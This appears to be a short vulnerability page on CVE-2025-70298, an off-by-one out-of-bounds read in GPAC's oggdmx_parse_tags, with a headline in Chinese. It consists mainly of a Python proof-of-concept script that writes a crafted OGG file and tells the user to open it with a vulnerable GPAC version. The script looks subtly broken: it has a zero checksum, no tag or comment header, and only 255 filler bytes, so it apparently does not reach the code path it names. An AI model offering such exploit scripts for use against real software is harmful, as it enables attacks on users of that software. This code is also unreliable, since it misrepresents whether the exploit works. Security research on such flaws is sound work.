CVE-2025-70298: GPAC oggdmx_parse_tags函数越界读取漏洞

# PoC for CVE-2025-70298 - GPAC oggdmx_parse_tags OOB Read # Generate malicious OGG file to trigger off-by-one in oggdmx_parse_tags import struct def create_malicious_ogg(): # OGG page header (common header) capture_pattern = b'OggS' version = b'\x00' header_type = b'\x00' granule_position = struct.pack('<Q', 0) serial_number = struct.pack('<I', 0x12345678) page_sequence = struct.pack('<I', 0) checksum = struct.pack('<I', 0) page_segments = b'\x01' segment_table = b'\xff' # Craft payload that triggers off-by-one in oggdmx_parse_tags # The vulnerability occurs when parsing tag data with incorrect bounds check payload = b'A' * 255 header = capture_pattern + version + header_type + granule_position header += serial_number + page_sequence + checksum + page_segments + segment_table return header + payload def main(): poc_file = 'CVE-2025-70298.ogg' with open(poc_file, 'wb') as f: f.write(create_malicious_ogg()) print(f'PoC file created: {poc_file}') print('Usage: Open this file with vulnerable GPAC version <= 2.4.0') if __name__ == '__main__': main()